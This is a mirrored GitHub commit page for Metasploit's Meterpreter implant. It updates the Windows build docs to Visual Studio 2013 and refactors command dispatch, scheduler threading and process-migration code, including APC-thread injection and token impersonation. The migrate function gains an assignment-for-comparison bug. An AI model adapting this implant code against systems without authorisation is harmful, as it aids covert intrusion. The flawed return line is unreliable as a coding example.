github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-24 18:16:24 +01:00
Code Releases Activity

Merge branch 'upstream/master' into channel_refactor_2

Browse Source 
Conflicts:
	source/common/arch/posix/scheduler.c
	source/common/arch/win/scheduler.c
This commit is contained in:
OJ 2013-11-07 08:09:51 +10:00
commit d93a78e305
57 changed files with 1218 additions and 1253 deletions

1
c/meterpreter/.travis.yml

@ -5,5 +5,6 @@ notifications:
irc: "irc.freenode.org#msfnotify"
before_install:
- sudo apt-get update
- sudo apt-get install jam
- sudo apt-get install gcc-multilib

38
c/meterpreter/README.md

@ -9,37 +9,25 @@ This is the new repository for the Meterpreter [source], which was originally in
Building - Windows
==================
Meterpreter is now being built with [Visual Studio 2012 Express for Desktop][vs_express] or any
paid version of [Visual Studio 2012][vs_paid]. Earlier toolsets on Windows are no longer
supported.
As of commit a2888b1b4862819c9aae81bf46d8c92d8164c598, Meterpreter is built
with [Visual Studio 2013 Express for Desktop][vs_express] or any paid version
of [Visual Studio 2013][vs_paid]. Earlier toolsets on Windows are no longer
supported -- this includes Visual Studio 2012. Make sure that the version that
you download is `Visual Studio Express 2013 for Windows Desktop`. If you are
using a dedicated build machine, your best bet is to uninstall Visual Studio
2012 if your only project is Meterpreter.
Visual Studio 2012 requires .NET 4.5 in order to run, and as a result isn't compatible
Visual Studio 2013 requires .NET 4.5.1 in order to run, and as a result isn't compatible
with Windows XP due to the fact that .NET 4.5 will not run on Windows XP. However, this
does not mean that Metepreter itself will not run on Windows XP, it just means that it's
not possible to _build_ it on Windows XP.
Visual Studio 2012 Express
--------------------------
In order to build successfully with this version of Visual Studio you must first make sure
that the most recent updates have been applied. At the time of writing, the latest known
update is **Update 3**. Without this update you won't be able to build.
To make sure you have the appropriate updates applied:
1. Open Visual Studio 2012.
1. Open the `Tools` menu and select `Extensions and Updates`
1. Select the `Updates` item on the left side of the dialog box.
1. Follow the prompts to install any updates that are found.
With those updates applied you should be ready to build Meterpreeter.
Running the Build
-----------------
Open up a Visual Studio command prompt by selecting `Developer Command Prompt for VS2012`
Open up a Visual Studio command prompt by selecting `Developer Command Prompt for VS2013`
from the Start menu. Alternatively you can run `vcvars32.bat` from an existing command
line prompt, just make sure it's the VS2012 one if you have multiple versions of VS
line prompt, just make sure it's the VS2013 one if you have multiple versions of VS
installed on your machine.
Once you have your environment variables set up, change to the root folder where the
@ -133,7 +121,7 @@ project going by doing the following:
1. Create a new folder called `source/extensions/splat`.
1. Copy `source/extensions/bare/bare.c` to `source/extensions/splat/splat.c`
1. Copy `source/extensions/bare/bare.h` to `source/extensions/splat/splat.h`
1. Open `workspace/meterpreter.sln` in Visual Studio 2012.
1. Open `workspace/meterpreter.sln` in Visual Studio 2013.
1. Right-click on the solution item called `Solution 'meterpreter'` and
select `Add`, then `Existing Project...`.
1. Browse to your new project's location at `workspace/ext_server_splat`
@ -168,8 +156,8 @@ Things to Remember
Good luck!
[vs_express]: http://www.microsoft.com/visualstudio/eng/downloads#d-2012-express
[vs_paid]: http://www.microsoft.com/visualstudio/eng/downloads#d-2012-editions
[vs_express]: http://www.microsoft.com/visualstudio/eng/downloads#d-2013-express
[vs_paid]: http://www.microsoft.com/visualstudio/eng/downloads#d-2013-editions
[source]: https://github.com/rapid7/meterpreter
[framework]: https://github.com/rapid7/metasploit-framework
[build_icon]: https://ci.metasploit.com/buildStatus/icon?job=MeterpreterWin

21
c/meterpreter/make.bat

@ -1,24 +1,7 @@
@ECHO OFF
IF "%1"=="clean" GOTO CLEAN
IF "%1"=="docs" GOTO DOCS
IF "%VCINSTALLDIR%" == "" (
ECHO "VC++ Environment not found, attempting to locate..."
REM Attempt to load up the dev env variables if they're not
REM set, saves people doing it manually
SET SETUP="Microsoft Visual Studio 11.0\Common7\Tools\vsvars32.bat"
IF EXIST "%ProgramFiles%\%SETUP%" (
ECHO "Found at '%ProgramFiles%\%SETUP%'"
"%ProgramFiles%\%SETUP%"
)
IF EXIST "%ProgramFiles(x86)%\%SETUP%" (
ECHO "Found at '%ProgramFiles(x86)%\%SETUP%'"
"%ProgramFiles(x86)%\%SETUP%"
)
REM If we still don't have what we need, then throw an error
IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
)
IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
SET PREF=
IF EXIST "..\pssdk\" SET PREF=r7_
@ -62,6 +45,6 @@ GOTO :END
:NEED_VS
ECHO "This command must be executed from within a Visual Studio Command prompt."
ECHO "This can be found under Microsoft Visual Studio 2012 -> Visual Studio Tools"
ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools"
:END

2
c/meterpreter/source/common/arch/posix/scheduler.c

@ -137,7 +137,7 @@ DWORD scheduler_insert_waitable( HANDLE waitable, LPVOID entryContext, LPVOID th
entry->pause = event_create();
entry->resume = event_create();
swt = thread_create( scheduler_waitable_thread, entry, threadContext );
swt = thread_create( scheduler_waitable_thread, entry, threadContext, NULL );
if( swt != NULL )
{
dprintf( "[SCHEDULER] created scheduler_waitable_thread 0x%08X", swt );

29
c/meterpreter/source/common/arch/win/i386/base_dispatch.c

@ -65,7 +65,7 @@ typedef struct _MIGRATECONTEXT
/*
* Migrate the meterpreter server from the current process into another process.
*/
DWORD remote_request_core_migrate( Remote * remote, Packet * packet )
BOOL remote_request_core_migrate( Remote * remote, Packet * packet, DWORD* pResult )
{
DWORD dwResult = ERROR_SUCCESS;
Packet * response = NULL;
@ -185,26 +185,12 @@ DWORD remote_request_core_migrate( Remote * remote, Packet * packet )
if( inject_via_apcthread( remote, response, hProcess, dwProcessID, dwDestinationArch, lpMemory, ((BYTE*)lpMemory+dwMigrateStubLength) ) != ERROR_SUCCESS )
BREAK_ON_ERROR( "[MIGRATE] inject_via_apcthread failed" )
}
/*
// Wait at most 15 seconds for the event to be set letting us know that it's finished
if( WaitForSingleObjectEx( hEvent, 15000, FALSE ) != WAIT_OBJECT_0 )
BREAK_ON_ERROR( "[MIGRATE] WaitForSingleObjectEx failed" )
// Signal the main server thread to begin the shutdown as migration has been successfull.
dprintf("[MIGRATE] Shutting down the Meterpreter thread 1 (signaling main thread)...");
thread_sigterm( serverThread );
*/
// Signal the main server thread to begin the shutdown as migration has been successfull.
// If the thread is not killed, the pending packet_receive prevents the new process
// from being able to negotiate SSL.
dprintf("[MIGRATE] Shutting down the Meterpreter thread 1 (killing the main thread)...");
thread_kill( serverThread );
// Wait at most 15 seconds for the event to be set letting us know that it's finished
// Unfortunately, its too late to do anything about a failure at this point
if( WaitForSingleObjectEx( hEvent, 15000, FALSE ) != WAIT_OBJECT_0 )
dprintf("[MIGRATE] WaitForSingleObjectEx failed with no way to recover");
//// Wait at most 15 seconds for the event to be set letting us know that it's finished
//// Unfortunately, its too late to do anything about a failure at this point
//if( WaitForSingleObjectEx( hEvent, 15000, FALSE ) != WAIT_OBJECT_0 )
// dprintf("[MIGRATE] WaitForSingleObjectEx failed with no way to recover");
dwResult = ERROR_SUCCESS;
@ -221,7 +207,10 @@ DWORD remote_request_core_migrate( Remote * remote, Packet * packet )
if( hEvent )
CloseHandle( hEvent );
return dwResult;
if( pResult )
*pResult = dwResult;
return dwResult = ERROR_SUCCESS ? TRUE : FALSE;
}

6
c/meterpreter/source/common/arch/win/scheduler.c

@ -86,7 +86,7 @@ DWORD scheduler_destroy( VOID )
while( TRUE )
{
dprintf( "[SCHEDULER] scheduler_destroy, popping off another item from thread liat..." );
dprintf( "[SCHEDULER] scheduler_destroy, popping off another item from thread list..." );
thread = (THREAD *)list_pop( jlist );
if( thread == NULL )
@ -135,7 +135,7 @@ DWORD scheduler_insert_waitable( HANDLE waitable, LPVOID entryContext, LPVOID th
entry->pause = event_create();
entry->resume = event_create();
swt = thread_create( scheduler_waitable_thread, entry, threadContext );
swt = thread_create( scheduler_waitable_thread, entry, threadContext, NULL );
if( swt != NULL )
{
dprintf( "[SCHEDULER] created scheduler_waitable_thread 0x%08X", swt );
@ -306,4 +306,4 @@ DWORD THREADCALL scheduler_waitable_thread( THREAD * thread )
lock_release( schedulerThreadList->lock );
return ERROR_SUCCESS;
}
}

506
c/meterpreter/source/common/base.c

@ -5,59 +5,62 @@
#include "common.h"
// Local remote request implementors
extern DWORD remote_request_core_console_write(Remote *remote, Packet *packet);
extern DWORD remote_request_core_console_write( Remote *remote, Packet *packet );
extern DWORD remote_request_core_channel_open(Remote *remote, Packet *packet);
extern DWORD remote_request_core_channel_write(Remote *remote, Packet *packet);
extern DWORD remote_request_core_channel_read(Remote *remote, Packet *packet);
extern DWORD remote_request_core_channel_close(Remote *remote, Packet *packet);
extern DWORD remote_request_core_channel_seek(Remote *remote, Packet *packet);
extern DWORD remote_request_core_channel_eof(Remote *remote, Packet *packet);
extern DWORD remote_request_core_channel_tell(Remote *remote, Packet *packet);
extern DWORD remote_request_core_channel_interact(Remote *remote, Packet *packet);
extern DWORD remote_request_core_channel_open( Remote *remote, Packet *packet );
extern DWORD remote_request_core_channel_write( Remote *remote, Packet *packet );
extern DWORD remote_request_core_channel_read( Remote *remote, Packet *packet );
extern DWORD remote_request_core_channel_close( Remote *remote, Packet *packet );
extern DWORD remote_request_core_channel_seek( Remote *remote, Packet *packet );
extern DWORD remote_request_core_channel_eof( Remote *remote, Packet *packet );
extern DWORD remote_request_core_channel_tell( Remote *remote, Packet *packet );
extern DWORD remote_request_core_channel_interact( Remote *remote, Packet *packet );
extern DWORD remote_request_core_crypto_negotiate(Remote *remote, Packet *packet);
extern DWORD remote_request_core_crypto_negotiate( Remote *remote, Packet *packet );
extern DWORD remote_request_core_shutdown(Remote *remote, Packet *packet);
extern BOOL remote_request_core_shutdown(Remote *remote, Packet *packet, DWORD* pResult);
extern DWORD remote_request_core_migrate(Remote *remote, Packet *packet);
extern BOOL remote_request_core_migrate( Remote *remote, Packet *packet, DWORD* pResult );
// Local remote response implementors
extern DWORD remote_response_core_console_write(Remote *remote, Packet *packet);
extern DWORD remote_response_core_console_write( Remote *remote, Packet *packet );
extern DWORD remote_response_core_channel_open(Remote *remote, Packet *packet);
extern DWORD remote_response_core_channel_close(Remote *remote, Packet *packet);
extern DWORD remote_response_core_channel_open( Remote *remote, Packet *packet );
extern DWORD remote_response_core_channel_close( Remote *remote, Packet *packet );
DWORD remote_request_core_console_write(Remote *remote, Packet *packet)
DWORD remote_request_core_console_write( Remote *remote, Packet *packet )
{
return ERROR_SUCCESS;
}
DWORD remote_response_core_console_write(Remote *remote, Packet *packet)
DWORD remote_response_core_console_write( Remote *remote, Packet *packet )
{
return ERROR_SUCCESS;
}
BOOL command_is_inline( Command *command, Packet *packet );
Command* command_locate( Packet *packet );
DWORD command_validate_arguments(Command *command, Packet *packet);
DWORD THREADCALL command_process_thread( THREAD * thread );
/*!
* @brief Base RPC dispatch table.
*/
Command commands[] =
Command base_commands[] =
{
/*
* Core commands
*/
// Console commands
{ "core_console_write",
{ remote_request_core_console_write, { TLV_META_TYPE_STRING }, 1 | ARGUMENT_FLAG_REPEAT },
{ remote_response_core_console_write, EMPTY_TLV },
{ remote_request_core_console_write, NULL, { TLV_META_TYPE_STRING }, 1 | ARGUMENT_FLAG_REPEAT },
{ remote_response_core_console_write, NULL, EMPTY_TLV },
},
// Native Channel commands
// this overloads the "core_channel_open" in the base command list
COMMAND_REQ_REP( "core_channel_open", remote_request_core_channel_open, remote_response_core_channel_open ),
COMMAND_REQ( "core_channel_write", remote_request_core_channel_write ),
COMMAND_REQ_REP( "core_channel_close", remote_request_core_channel_close, remote_response_core_channel_close ),
// Buffered/Pool channel commands
COMMAND_REQ( "core_channel_read", remote_request_core_channel_read ),
// Pool channel commands
@ -69,14 +72,17 @@ Command commands[] =
// Crypto
COMMAND_REQ( "core_crypto_negotiate", remote_request_core_crypto_negotiate ),
// Migration
COMMAND_REQ( "core_migrate", remote_request_core_migrate ),
COMMAND_INLINE_REQ( "core_migrate", remote_request_core_migrate ),
// Shutdown
COMMAND_REQ( "core_shutdown", remote_request_core_shutdown ),
COMMAND_INLINE_REQ( "core_shutdown", remote_request_core_shutdown ),
// Terminator
COMMAND_TERMINATOR
};
// Dynamically registered command extensions
/*!
* @brief Dynamically registered command extensions.
* @details A linked list of commands registered on the fly by reflectively-loaded extensions.
*/
Command *extension_commands = NULL;
/*!
@ -88,7 +94,7 @@ void command_register_all(Command commands[])
DWORD index;
for (index = 0; commands[index].method; index++)
command_register(&commands[index]);
command_register( &commands[index] );
}
/*!
@ -201,20 +207,153 @@ VOID reap_zombie_thread(void * param)
}
#endif
/*!
* @brief Process a command directly on the current thread.
* @param command Pointer to the \c Command to be executed.
* @param remote Pointer to the \c Remote endpoint for this command.
* @param packet Pointer to the \c Packet containing the command detail.
* @returns Boolean value indicating if the server should continue processing.
* @retval TRUE The server can and should continue processing.
* @retval FALSE The server should stop processing and shut down.
* @sa command_handle
* @sa command_process_thread
*/
BOOL command_process_inline( Command *command, Remote *remote, Packet *packet )
{
DWORD result;
BOOL serverContinue = TRUE;
Tlv requestIdTlv;
PCHAR requestId;
PacketTlvType packetTlvType;
dprintf( "[COMMAND] Executing command %s", command->method );
__try
{
do
{
#ifdef _WIN32
// Impersonate the thread token if needed (only on Windows)
if(remote->hServerToken != remote->hThreadToken) {
if(! ImpersonateLoggedOnUser(remote->hThreadToken)) {
dprintf( "[COMMAND] Failed to impersonate thread token (%s) (%u)", command->method, GetLastError());
}
}
#endif
// Validate the arguments, if requested. Always make sure argument
// lengths are sane.
if( command_validate_arguments( command, packet ) != ERROR_SUCCESS )
break;
packetTlvType = packet_get_type( packet );
switch ( packetTlvType )
{
case PACKET_TLV_TYPE_REQUEST:
case PACKET_TLV_TYPE_PLAIN_REQUEST:
if (command->request.inline_handler) {
dprintf( "[DISPATCH] executing inline request handler %s", command->method );
serverContinue = command->request.inline_handler( remote, packet, &result );
} else {
dprintf( "[DISPATCH] executing request handler %s", command->method );
result = command->request.handler( remote, packet );
}
break;
case PACKET_TLV_TYPE_RESPONSE:
case PACKET_TLV_TYPE_PLAIN_RESPONSE:
if (command->response.inline_handler) {
dprintf( "[DISPATCH] executing inline response handler %s", command->method );
serverContinue = command->response.inline_handler( remote, packet, &result );
} else {
dprintf( "[DISPATCH] executing response handler %s", command->method );
result = command->response.handler( remote, packet );
}
break;
}
dprintf("[COMMAND] Calling completion handlers...");
// Get the request identifier if the packet has one.
if ( packet_get_tlv_string( packet, TLV_TYPE_REQUEST_ID, &requestIdTlv ) == ERROR_SUCCESS )
requestId = (PCHAR)requestIdTlv.buffer;
// Finally, call completion routines for the provided identifier
if( ((packetTlvType == PACKET_TLV_TYPE_RESPONSE) || (packetTlvType == PACKET_TLV_TYPE_PLAIN_RESPONSE)) && requestId)
packet_call_completion_handlers( remote, packet, requestId );
} while( 0 );
}
__except( EXCEPTION_EXECUTE_HANDLER )
{
dprintf("[COMMAND] Exception hit in command %s", command->method );
}
packet_destroy( packet );
return serverContinue;
}
/*!
* @brief Handle an incoming command.
* @param remote Pointer to the \c Remote instance associated with this command.
* @param packet Pointer to the \c Packet containing the command data.
* @retval TRUE The server can and should continue processing.
* @retval FALSE The server should stop processing and shut down.
* @remark This function was incorporate to help support two things in meterpreter:
* -# A way of allowing a command to be processed directly on the main server
* thread and not on another thread (which in some cases can cause problems).
* -# A cleaner way of shutting down the server so that container processes
* can shutdown cleanly themselves, where appropriate.
*
* This function will look at the command definition and determine if it should
* be executed inline or on a new command thread.
* @sa command_process_inline
* @sa command_process_thread
*/
BOOL command_handle( Remote *remote, Packet *packet )
{
BOOL result = TRUE;
THREAD* cpt = NULL;
Command* command = NULL;
do
{
command = command_locate( packet );
if( command == NULL ) {
// We have no matching command for this packet, so it won't get handled. We
// need to clean up here before exiting out.
packet_destroy( packet );
break;
}
if( command_is_inline( command, packet ) ) {
dprintf( "Executing inline: %s", command->method );
result = command_process_inline( command, remote, packet );
} else {
dprintf( "Executing in thread: %s", command->method );
cpt = thread_create( command_process_thread, remote, packet, command );
if( cpt )
{
dprintf( "[DISPATCH] created command_process_thread 0x%08X, handle=0x%08X", cpt, cpt->handle );
thread_run( cpt );
}
}
} while(0);
return result;
}
/*!
* @brief Process a single command in a seperate thread of execution.
* @param thread Pointer to the thread to execute.
* @return Result of processing.
* @return Result of thread execution (not the result of the command).
* @sa command_handle
* @sa command_process_thread
*/
DWORD THREADCALL command_process_thread( THREAD * thread )
{
DWORD index = 0;
DWORD result = ERROR_SUCCESS;
Tlv methodTlv = {0};
Tlv requestIdTlv = {0};
PCHAR method = NULL;
PCHAR requestId = NULL;
Command * current = NULL;
Command * command = NULL;
Remote * remote = NULL;
Packet * packet = NULL;
@ -229,11 +368,16 @@ DWORD THREADCALL command_process_thread( THREAD * thread )
if( packet == NULL )
return ERROR_INVALID_DATA;
command = (Command *)thread->parameter3;
if( command == NULL )
return ERROR_INVALID_DATA;
if( commandThreadList == NULL )
{
commandThreadList = list_create();
if( commandThreadList == NULL )
return ERROR_INVALID_HANDLE;
#ifndef _WIN32
pthread_t tid;
pthread_create(&tid, NULL, reap_zombie_thread, NULL);
@ -243,73 +387,7 @@ DWORD THREADCALL command_process_thread( THREAD * thread )
list_add( commandThreadList, thread );
__try
{
do
{
// Extract the method
result = packet_get_tlv_string( packet, TLV_TYPE_METHOD, &methodTlv );
if( result != ERROR_SUCCESS )
break;
dprintf( "[COMMAND] Processing method %s", methodTlv.buffer );
#ifdef _WIN32
// Impersonate the thread token if needed (only on Windows)
if(remote->hServerToken != remote->hThreadToken) {
if(! ImpersonateLoggedOnUser(remote->hThreadToken)) {
dprintf( "[COMMAND] Failed to impersonate thread token (%s) (%u)", methodTlv.buffer, GetLastError());
}
}
#endif
// Get the request identifier if the packet has one.
result = packet_get_tlv_string( packet, TLV_TYPE_REQUEST_ID, &requestIdTlv );
if( result == ERROR_SUCCESS )
requestId = (PCHAR)requestIdTlv.buffer;
method = (PCHAR)methodTlv.buffer;
result = ERROR_NOT_FOUND;
// Try to find a match in the dispatch type
for( index = 0, result = ERROR_NOT_FOUND ; result == ERROR_NOT_FOUND && commands[index].method ; index++ )
{
if( strcmp( commands[index].method, method ) )
continue;
// Call the base handler
result = command_call_dispatch( &commands[index], remote, packet );
}
// Regardless of error code, try to see if someone has overriden a base handler
for( current = extension_commands, result = ERROR_NOT_FOUND ;
result == ERROR_NOT_FOUND && current && current->method ; current = current->next )
{
if( strcmp( current->method, method ) )
continue;
// Call the custom handler
result = command_call_dispatch( current, remote, packet );
}
dprintf("[COMMAND] Calling completion handlers...");
// Finally, call completion routines for the provided identifier
if( ((packet_get_type(packet) == PACKET_TLV_TYPE_RESPONSE) || (packet_get_type(packet) == PACKET_TLV_TYPE_PLAIN_RESPONSE)) && (requestId))
packet_call_completion_handlers( remote, packet, requestId );
// If we get here, we're successful.
result = ERROR_SUCCESS;
} while( 0 );
}
__except( EXCEPTION_EXECUTE_HANDLER )
{
dprintf("[COMMAND] Exception hit in command thread 0x%08X!", thread );
}
packet_destroy( packet );
command_process_inline( command, remote, packet );
if( list_remove( commandThreadList, thread ) )
thread_destroy( thread );
@ -317,146 +395,108 @@ DWORD THREADCALL command_process_thread( THREAD * thread )
return ERROR_SUCCESS;
}
/*
* Process a single command
*/
/*
DWORD command_process_remote(Remote *remote, Packet *inPacket)
{
DWORD res = ERROR_SUCCESS, index;
Tlv methodTlv, requestIdTlv;
Packet *localPacket = NULL;
PCHAR method, requestId = NULL;
Command *current;
do
{
// If no packet was providied, try to receive one.
if (!inPacket)
{
if ((res = packet_receive(remote, &localPacket)) != ERROR_SUCCESS)
break;
else
inPacket = localPacket;
}
// Extract the method
if ((packet_get_tlv_string(inPacket, TLV_TYPE_METHOD, &methodTlv)
!= ERROR_SUCCESS))
break;
dprintf("Processing method %s", methodTlv.buffer);
// Get the request identifier if the packet has one.
if (packet_get_tlv_string(inPacket, TLV_TYPE_REQUEST_ID,
&requestIdTlv) == ERROR_SUCCESS)
requestId = (PCHAR)requestIdTlv.buffer;
method = (PCHAR)methodTlv.buffer;
res = ERROR_NOT_FOUND;
// Try to find a match in the dispatch type
for (index = 0, res = ERROR_NOT_FOUND;
res = ERROR_NOT_FOUND && commands[index].method;
index++)
{
if (strcmp(commands[index].method, method))
continue;
// Call the base handler
res = command_call_dispatch(&commands[index], remote, inPacket);
}
// Regardless of error code, try to see if someone has overriden
// a base handler
for (current = extension_commands, res = ERROR_NOT_FOUND;
res == ERROR_NOT_FOUND && current && current->method;
current = current->next)
{
if (strcmp(current->method, method))
continue;
// Call the custom handler
res = command_call_dispatch(current, remote, inPacket);
}
dprintf("Calling completion handlers...");
// Finally, call completion routines for the provided identifier
if (((packet_get_type(inPacket) == PACKET_TLV_TYPE_RESPONSE) ||
(packet_get_type(inPacket) == PACKET_TLV_TYPE_PLAIN_RESPONSE)) &&
(requestId))
packet_call_completion_handlers(remote, inPacket, requestId);
// If we get here, we're successful.
res = ERROR_SUCCESS;
} while (0);
if (localPacket)
packet_destroy(localPacket);
return res;
}*/
/*
* Process incoming commands, calling dispatch tables appropriately
*/
/*
DWORD command_process_remote_loop(Remote *remote)
{
DWORD res = ERROR_SUCCESS;
Packet *packet;
while ((res = packet_receive(remote, &packet)) == ERROR_SUCCESS)
{
res = command_process_remote(remote, packet);
// Destroy the packet
packet_destroy(packet);
// If a command returned exit, we shall return.
if (res == ERROR_INSTALL_USEREXIT)
break;
}
return res;
}
*/
/*!
* @brief Call the dispatch routine for a given command.
* @param command The command to call the dispatch routine on.
* @param remote Pointer to the remote connection.
* @param packet Pointer to the current packet.
* @return Result of the command dispatch handler call.
* @brief Determine if a given command/packet combination should be invoked inline.
* @param command Pointer to the \c Command being invoked.
* @param packet Pointer to the \c Packet being received/sent.
* @returns Boolean indication of whether the command should be executed inline.
* @retval TRUE The command should be executed inline on the current thread.
* @retval FALSE The command should be executed on a new thread.
*/
DWORD command_call_dispatch(Command *command, Remote *remote, Packet *packet)
BOOL command_is_inline( Command *command, Packet *packet )
{
DWORD res;
// Validate the arguments, if requested. Always make sure argument
// lengths are sane.
if ((res = command_validate_arguments(command, packet)) != ERROR_SUCCESS)
return res;
switch (packet_get_type(packet))
switch (packet_get_type( packet ))
{
case PACKET_TLV_TYPE_REQUEST:
case PACKET_TLV_TYPE_PLAIN_REQUEST:
if (command->request.handler)
res = command->request.handler(remote, packet);
break;
if (command->request.inline_handler)
return TRUE;
case PACKET_TLV_TYPE_RESPONSE:
case PACKET_TLV_TYPE_PLAIN_RESPONSE:
if (command->response.handler)
res = command->response.handler(remote, packet);
break;
default:
res = ERROR_NOT_FOUND;
break;
if (command->response.inline_handler)
return TRUE;
}
return res;
return FALSE;
}
/*!
* @brief Attempt to locate a command in the base command list.
* @param method String that identifies the command.
* @returns Pointer to the command entry in the base command list.
* @retval NULL Indicates that no command was found for the given method.
* @retval NON-NULL Pointer to the command that can be executed.
*/
Command* command_locate_base( const char* method )
{
DWORD index;
dprintf( "[COMMAND EXEC] Attempting to locate base command %s", method );
for( index = 0; base_commands[index].method ; ++index )
if( strcmp( base_commands[index].method, method ) == 0 )
return &base_commands[index];
dprintf( "[COMMAND EXEC] Couldn't find base command %s", method );
return NULL;
}
/*!
* @brief Attempt to locate a command in the extensions command list.
* @param method String that identifies the command.
* @returns Pointer to the command entry in the extensions command list.
* @retval NULL Indicates that no command was found for the given method.
* @retval NON-NULL Pointer to the command that can be executed.
*/
Command* command_locate_extension( const char* method )
{
Command* command;
dprintf( "[COMMAND EXEC] Attempting to locate extension command %s", method );
for( command = extension_commands; command; command = command->next )
if( strcmp( command->method, method ) == 0 )
return command;
dprintf( "[COMMAND EXEC] Couldn't find extension command %s", method );
return NULL;
}
/*!
* @brief Attempt to locate a command to execute based on the method.
* @param method String that identifies the command.
* @returns Pointer to the command entry to execute.
* @retval NULL Indicates that no command was found for the given method.
* @retval NON-NULL Pointer to the command that can be executed.
* @remark This function tries to find an extension command first. If
* found it will be returned. If not, the base command list is
* queried. This supports the notion of extensions overloading
* the base commands.
* @sa command_locate_extension
* @sa command_locate_base
*/
Command* command_locate( Packet *packet )
{
Command* command = NULL;
DWORD dwResult;
Tlv methodTlv;
do
{
dwResult = packet_get_tlv_string( packet, TLV_TYPE_METHOD, &methodTlv );
if( dwResult != ERROR_SUCCESS ) {
dprintf( "[COMMAND] Unable to extract method from packet." );
break;
}
// check for an overload first.
command = command_locate_extension( (PCHAR)methodTlv.buffer );
// if no overload, then fallback on base.
if( command == NULL )
command = command_locate_base( (PCHAR)methodTlv.buffer );
} while(0);
return command;
}
/*!

52
c/meterpreter/source/common/base.h

@ -10,6 +10,7 @@
/*! @brief Function pointer type that defines the interface for a dispatch handler. */
typedef DWORD (*DISPATCH_ROUTINE)( Remote *remote, Packet *packet );
typedef BOOL (*INLINE_DISPATCH_ROUTINE)( Remote *remote, Packet *packet, DWORD* result);
/*! @brief Specifies the maximum number of arguments that are checked/handled
* in a request/response packet dispatcher.
@ -24,15 +25,30 @@ typedef DWORD (*DISPATCH_ROUTINE)( Remote *remote, Packet *packet );
/*! @brief Helper macro that contains the required NULL initialisations for a command handler TLV info. */
#define EMPTY_TLV { 0 }, 0
/*! @brief Helper macro which defines an empty dispatch handler. */
#define EMPTY_DISPATCH_HANDLER NULL, EMPTY_TLV
#define EMPTY_DISPATCH_HANDLER NULL, NULL, EMPTY_TLV
/*! @brief Helper macro that defines terminator for command lists. */
#define COMMAND_TERMINATOR { NULL, { EMPTY_DISPATCH_HANDLER }, { EMPTY_DISPATCH_HANDLER } }
/*! @brief Helper macro that defines a command instance with a request handler only. */
#define COMMAND_REQ(name, reqHandler) { name, { reqHandler, EMPTY_TLV }, { EMPTY_DISPATCH_HANDLER } }
/*! @brief Helper macro that defines a command instance with a response handler only. */
#define COMMAND_REP(name, repHandler) { name, { EMPTY_DISPATCH_HANDLER }, { repHandler, EMPTY_TLV } }
/*! @brief Helper macro that defines a command instance with both a request and response handler. */
#define COMMAND_REQ_REP(name, reqHandler, repHandler) { name, { reqHandler, EMPTY_TLV }, { repHandler, EMPTY_TLV } }
/*!
* @brief Helper macro that defines a command instance with a request handler only.
* @remarks The request handler will be executed on a separate thread.
*/
#define COMMAND_REQ(name, reqHandler) { name, { reqHandler, NULL, EMPTY_TLV }, { EMPTY_DISPATCH_HANDLER } }
/*!
* @brief Helper macro that defines a command instance with a response handler only.
* @remarks The request handler will be executed on a separate thread.
*/
#define COMMAND_REP(name, repHandler) { name, { EMPTY_DISPATCH_HANDLER }, { repHandler, NULL, EMPTY_TLV } }
/*!
* @brief Helper macro that defines a command instance with both a request and response handler.
* @remarks The request handler will be executed on a separate thread.
*/
#define COMMAND_REQ_REP(name, reqHandler, repHandler) { name, { reqHandler, NULL, EMPTY_TLV }, { repHandler, NULL, EMPTY_TLV } }
/*!
* @brief Helper macro that defines a command instance with an inline request handler only.
* @remarks The request handler will be executed on the server thread.
*/
#define COMMAND_INLINE_REQ(name, reqHandler) { name, { NULL, reqHandler, EMPTY_TLV }, { EMPTY_DISPATCH_HANDLER } }
// Place holders
/*! @deprecated This entity is not used and may be removed in future. */
@ -46,12 +62,21 @@ typedef DWORD (*DISPATCH_ROUTINE)( Remote *remote, Packet *packet );
typedef struct
{
/*! @brief Pointer to the routine that will be called to handle the request/response. */
DISPATCH_ROUTINE handler;
DISPATCH_ROUTINE handler;
/*!
* @brief Pointer to the routine that will be called on the _current thread_.
* @remark If this function is specified then it will be invoked on the current server
* thread rather than having a new thread allocated to it for processing.
* The result of this routine will indicate whether the server should continue.
* If this value is specified (ie. non-NULL) then the \c handler value is ignored.
*/
INLINE_DISPATCH_ROUTINE inline_handler;
/*! @brief Array of types that match the expected arguments for this response/request routine. */
TlvMetaType argumentTypes[MAX_CHECKED_ARGUMENTS];
TlvMetaType argumentTypes[MAX_CHECKED_ARGUMENTS];
/*! @brief The number of entries in the \c argumentTypes array. */
DWORD numArgumentTypes;
DWORD numArgumentTypes;
} PacketDispatcher;
/*!
@ -75,11 +100,6 @@ LINKAGE DWORD command_deregister(Command *command);
LINKAGE VOID command_join_threads( VOID );
LINKAGE DWORD THREADCALL command_process_thread( THREAD * thread );
//LINKAGE DWORD command_process_remote(Remote *remote, Packet *inPacket);
//LINKAGE DWORD command_process_remote_loop(Remote *remote);
LINKAGE DWORD command_call_dispatch(Command *command, Remote *remote, Packet *packet);
LINKAGE DWORD command_validate_arguments(Command *command, Packet *packet);
LINKAGE BOOL command_handle( Remote *remote, Packet *packet );
#endif

47
c/meterpreter/source/common/base_dispatch_common.c

@ -1,15 +1,5 @@
#include "common.h"
#ifdef _WIN32
/* it appears extern'd globals screw up the posix build because the linker
* fails to find them and causes metsrv to exit.
* - egypt
*/
// An external reference to the meterpreters main server thread, so we can shutdown gracefully after successfull migration.
extern THREAD * serverThread;
#endif
/*
* core_channel_open
* -----------------
@ -31,9 +21,10 @@ DWORD remote_request_core_channel_open(Remote *remote, Packet *packet)
do
{
dprintf( "[CHANNEL] Opening new channel for packet %p", packet );
// If the channel open request had a specific channel type
if ((channelType = packet_get_tlv_value_string(packet,
TLV_TYPE_CHANNEL_TYPE)))
if ((channelType = packet_get_tlv_value_string(packet, TLV_TYPE_CHANNEL_TYPE)))
{
res = ERROR_NOT_FOUND;
break;
@ -42,28 +33,36 @@ DWORD remote_request_core_channel_open(Remote *remote, Packet *packet)
// Get any flags that were supplied
flags = packet_get_tlv_value_uint(packet, TLV_TYPE_FLAGS);
dprintf( "[CHANNEL] Opening %s %u", channelType, flags );
// Allocate a response
response = packet_create_response(packet);
// Did the response allocation fail?
if ((!response) ||
(!(newChannel = channel_create(0, flags))))
if ((!response) || (!(newChannel = channel_create(0, flags))))
{
res = ERROR_NOT_ENOUGH_MEMORY;
break;
}
